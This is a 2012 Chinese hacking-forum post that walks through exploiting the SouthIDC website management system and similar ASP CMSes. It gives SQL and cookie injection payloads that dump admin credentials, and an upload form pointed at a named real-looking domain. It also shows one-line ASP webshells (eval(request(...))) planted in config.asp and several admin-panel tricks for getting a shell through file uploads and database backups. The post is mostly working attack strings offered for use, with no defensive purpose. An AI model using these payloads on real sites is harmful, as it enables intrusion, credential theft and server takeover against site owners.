找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2172|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
- i* r! q" h  z3 Q3 ~& G1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
( `' j5 G. C) R! b+ h/ ~, D也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
$ m: t4 _: h4 D) A: D, Q- x# [直接暴管理员帐号密码(md5)
; \4 [" M0 ?9 v' p3 Z2.登陆后台. Y6 I' L# z+ q/ s' D
3.利用编辑器上传:& y7 G2 ?. a1 E  U  c" r1 K
访问admin/southidceditor/admin_style.asp
/ z4 _# O; |$ t7 S' Q修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
+ h$ V& P; b7 z2 s$ S7 N9 F2 S: l+ S6 j
7 [8 i  E6 |) d========================================; d4 X8 }, q; d  }# [
$ B9 b5 W7 E4 j$ l9 s
参考资料整理:
- j- c. Q! P2 Z: h1 a5 u南方数据、良精系统、网软天下漏洞利用4 Y& {8 V+ u' R( R' v0 e

* N1 J9 \$ z* _1、通过upfile_other.asp漏洞文件直接取SHELL
: ~+ I  z6 H6 h( z直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:9 |/ y; e, L- a7 C8 a" b+ R
<HTML><HEAD> 1 g% U8 w5 D. p; T2 k
<META http-equiv=Content-Type content="text/html; charset=gb2312"> $ w  F0 |1 O: I8 l8 B$ I: ?# ~
<STYLE type=text/css>BODY {
+ U4 r# I1 k0 `3 q; N' ?, XFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
6 `; @9 ?9 p1 b, n! u# h! T+ f} 9 L% d* |7 u$ I1 n
.tx1 { , {3 z: {" \+ C. o  C
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
2 E; y0 m) A7 M}
# _/ T4 z+ f$ Y8 y& E9 \" `</STYLE>
! Y  o+ `  [# V$ ^* c% Q" L<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> 1 K+ p4 ^  e1 B2 E8 O* v
<BODY leftMargin=0 topMargin=0> ( V! K2 j% S6 H; _! O- w
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post ) ], t/ d6 r, j& z, V6 r8 Z- _6 D. S
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
7 ]+ u2 v1 Y# k/ ?<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>8 n6 x2 y' ^& x# U. b" c" d8 k
- W2 e' n& }& U% ^+ d
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。) W/ I8 d  G% i7 ?% l' n" F' s
注:此方法通杀南方数据、良精系统、网软天下等
( ?1 |( o0 k$ f$ e7 T$ w' f3 y: I
+ x/ v- \3 k: e+ X7 W3 p% d, C2、通过注入秒杀管理员帐号密码,使用如下:! l! ^6 D" Y; h
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
+ X. e7 g8 c% e) |" y以上代码直接暴管理员帐号和密码,取SHELL方法如下:0 p  k" U" H1 j
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’& u( Q+ {5 \% }
成功把shell写入http://www.target.com/inc/config.asp! \% P. m1 j1 Z" g9 [( ^/ K: x
这里一句话chr(32)密码是“#”; O" e' n9 W9 w/ `' W
3、cookie注入
, j( K/ E$ Z( Z* U: k清空地址栏,利用union语句来注入,提交:
/ L2 i* w1 p5 b; y, Vjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))' H: _+ t# x3 }2 ]) `* i5 `% i
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
- E$ r& q: j; i, _+ a$ o+ {8 O注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
. K/ ~* s4 G. Y4 j$ ^1 j8 O(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
" n, |1 x2 u$ @/ }
/ }- y7 E8 ?$ Q3 ]三、后台取SHELL方法总结
3 ^- Q9 T; U0 B1 E' }(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:7 `7 f9 U  s* P; g2 e3 A
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
, R9 z4 B' ?6 n' P; G7 ]& g这时再打开一句话马的客户端,提交同样得到一个小马) w5 b0 ^5 w! ?* {
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
! Y6 }/ _5 J1 e" {! o(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
4 m0 c& ]$ ]9 |if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
+ c+ ]5 L" R2 u& I% k# KEnableUpload=false0 W2 e/ M/ A1 I  I( r& W$ A
1 E5 q+ M- c3 V8 p
end if ' I; t9 W5 [; y; ^' Z1 C, k
if EnableUpload=false then
2 M) G. f2 C9 H$ U  N. Vmsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType3 f8 Q) s9 d' g1 D( a
FoundErr=true
4 e  R$ }$ G4 ]- j( ]" p7 C7 Xend if3 `! k4 h) D+ c8 B* a
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
' }3 _: `' F) ^提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)) k% Z6 B1 R4 @# i# u4 f1 W, i; \
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
7 v+ B7 s4 _- G( o' R$ k* s# b3 M/ A+ e3 x7 B) a
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的# Y  N' D! K$ r
直接访问备份后的地址,就得到一个webshell  ]" E% R- m: T
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表